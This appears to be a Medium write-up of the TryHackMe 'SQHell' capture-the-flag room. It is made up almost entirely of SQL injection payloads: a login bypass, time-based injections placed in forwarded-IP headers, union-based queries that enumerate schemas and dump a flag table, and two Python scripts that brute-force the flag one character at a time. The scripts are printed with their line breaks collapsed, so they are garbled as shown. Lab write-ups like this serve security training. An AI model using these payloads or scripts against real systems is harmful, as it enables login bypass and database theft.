THM SQHell [TR][Manuel]

Flag-1:

' or 1=1-- -
select * from users where username='' or 1=1 -- -' and password='';

Flag-2:

X-Backend-Host: 127.0.0.1';select sleep(5);X-BlueCoat-Via: 127.0.0.1';select sleep(5);X-Cache-Info: 127.0.0.1';select sleep(5);X-Forward-For: 127.0.0.1';select sleep(5);X-Forwarded-By: 127.0.0.1';select sleep(5);X-Forwarded-For-Original: 127.0.0.1';select sleep(5);X-Forwarded-For: 127.0.0.1';select sleep(5);X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1';select sleep(5);X-Forwarded-Server: 127.0.0.1';select sleep(5);X-Forwared-Host: 127.0.0.1';select sleep(5);X-From-IP: 127.0.0.1';select sleep(5);X-From: 127.0.0.1';select sleep(5);X-Gateway-Host: 127.0.0.1';select sleep(5);X-Host: 127.0.0.1';select sleep(5);X-Ip: 127.0.0.1';select sleep(5);X-Original-Host: 127.0.0.1';select sleep(5);X-Original-IP: 127.0.0.1';select sleep(5);X-Original-Remote-Addr: 127.0.0.1';select sleep(5);X-Original-Url: 127.0.0.1';select sleep(5);X-Originally-Forwarded-For: 127.0.0.1';select sleep(5);X-Originating-IP: 127.0.0.1';select sleep(5);X-ProxyMesh-IP: 127.0.0.1';select sleep(5);X-ProxyUser-IP: 127.0.0.1';select sleep(5);X-Real-IP: 127.0.0.1';select sleep(5);X-Remote-Addr: 127.0.0.1';select sleep(5);X-Remote-IP: 127.0.0.1';select sleep(5);X-True-Client-IP: 127.0.0.1';select sleep(5);
' ;SELECT IF(SUBSTRING(flag,1,1)=CHAR(97),sleep(3),null) FROM flag;--+-
import requestsimport timeflag=""digit=1headers = {'Host': '10.10.92.166','Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','Referer': 'http://10.10.32.43/','Accept-Encoding': 'gzip, deflate','Accept-Language': 'en-US,en;q=0.9','X-Forwarded-For': '127.0.0.1\' ;SELECT IF(SUBSTRING(flag,1,1)=CHAR(97),sleep(3),null) FROM flag;--+-','Connection': 'close',}while(True):for char in range(127):headers['X-Forwarded-For']=f'127.0.0.1\' ;SELECT IF(SUBSTRING(flag,{digit},1)=CHAR({char}),sleep(3),null) FROM flag;--+-'start_time=time.time()response = requests.get('http://10.10.92.166/', headers=headers)end_time=time.time()if(end_time-start_time>=3):flag+=chr(char)print(flag)breakdigit+=1

Flag-3:

admin' and (SELECT SUBSTRING(flag,1,1)=CHAR(97) FROM flag) --+-
import requestsflag=""digit=1while(True):for char in range(127):url=f"http://10.10.41.105/register/user-check?username=admin' and (SELECT SUBSTRING(flag,{digit},1)=CHAR({char}) FROM flag)--+-"response = requests.get(url).json()['available']if not response:flag+=chr(char)print(flag)if(chr(char)=="}"):exit(f"[+]{flag}")breakdigit+=1

Flag-4:

-1 union select null,null,null--+-
-1 union select null,group_concat(table_name),null from information_schema.tables where table_schema=database()--+-
-1 union select "1 union select 11,22,33,44",null,null --+-
-1 union select "1 union select 11,group_concat(table_name),33,44 from information_schema.tables where table_schema=database()",null,null --+-
-1 union select "7 union select 11,flag,33,44 from flag",null,null from information_schema.tables where table_schema=database();-- -

Flag-5:

-1 union select 1,2,3,4-- -
-1 union select null,null,group_concat(table_name,"\n"),null from information_schema.tables where table_schema=database();-- -
-1 union select null,null,group_concat(column_name,"\n"),null from information_schema.columns where table_name='flag'-- -
-1 union select null,id,flag,null from flag-- -

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Life

Life

More from Medium

CLOSE BETA REVIEW: $600 FOR THE MOST ATTRACTIVE REVIEW

Making SeedSigner start up 1.35x faster

CS373 Spring 2022: Dani Amir